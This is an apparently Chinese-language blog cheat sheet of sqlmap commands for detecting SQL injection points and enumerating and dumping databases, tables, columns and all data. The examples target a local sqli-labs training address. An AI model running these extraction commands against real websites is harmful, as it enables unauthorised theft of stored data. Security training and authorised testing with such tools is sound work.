sqlmap常用命令

@ZZHow(ZZHow1024)

一、扫描注入点

1.GET方法,给URL:

  • #探测该url是否存在漏洞
sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
  • #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
sql 复制代码
python sqlmap.py -u "http://www.xx.com/username/admin*"

2.POST方法,给抓包文件:

  • #bp.txt是我们抓取的http的请求包
sql 复制代码
python sqlmap.py -r bp.txt  
  • #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sql 复制代码
python sqlmap.py -r bp.txt -p username  

二、爆基本信息自动化

0.查看当前的数据库

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --current-db

1.爆出所有的数据库

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --dbs

2.爆出所有的数据表

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --tables

3.爆出数据库中所有的字段

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --columns

三、爆具体信息自动化

1.爆出数据库security中的所有的表

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables

2.爆出security数据库中users表中的所有的字段

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns

爆出数据库security中的users表中的username字段中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump 

四、爆信数据自动化

1.爆出该数据库中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all

2.爆出数据库security中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all

3.爆出数据库security中的users表中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all
相关推荐
光影少年8 小时前
网络安全生态及学习路线
学习·安全·web安全
序^章9 小时前
【CTF | 比赛篇】Newstar ctf web
网络安全·ctf
white-persist11 小时前
什么是网络安全,网络空间安全有哪些安全?
服务器·网络·安全·web安全·网络安全·系统安全·安全架构
virelin_Y.lin11 小时前
系统与网络安全------弹性交换网络(4)
网络·安全·web安全·mstp
德福危险17 小时前
密码枚举的艺术:靶机练习之midwest
服务器·安全·web安全
jieyu111920 小时前
uploads-labs靶场通关(2)
web安全·靶场通关
Forfun_tt20 小时前
upload-labs pass-19
web安全·网络安全
缘友一世20 小时前
文件上传漏洞和绕过技术
web安全·网络安全·渗透测试·文件上传漏洞·开发安全
岛屿旅人1 天前
智库报告美国如何打网络战
网络·人工智能·安全·web安全
网安INF1 天前
网络攻防技术:拒绝服务攻击
网络·安全·web安全·网络安全